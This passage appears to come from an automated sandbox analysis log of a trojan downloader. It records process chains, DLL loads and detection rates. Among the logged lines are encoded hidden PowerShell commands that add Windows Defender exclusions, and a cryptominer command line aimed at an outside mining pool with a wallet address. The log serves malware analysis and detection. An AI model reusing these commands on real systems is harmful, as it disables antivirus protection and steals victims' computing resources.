Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\fdyryi.exe C:\Users\user\AppData\Local\Temp\fdyryi.exe
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process created: C:\Users\user\AppData\Local\Temp\fdyryi.exe "C:\Users\user\AppData\Local\Temp\fdyryi.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AYQBtAGUAZABQAGUAcgBtAGkAcwBzAGkAbwBuAFMAZQB0AHMAXABBAGwAZwBvAHIAaQB0AGgAbQBUAHkAcABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABiAHIAbwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGEAbQBlAGQAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABzAFwAQQBsAGcAbwByAGkAdABoAG0AVAB5AHAAZQAuAGUAeABlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe "C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe"
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe "C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe"
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process created: C:\Users\user\AppData\Local\Temp\fdyryi.exe "C:\Users\user\AppData\Local\Temp\fdyryi.exe"
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe "C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe"
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe "C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Section loaded: msasn1.dll Jump to behavior
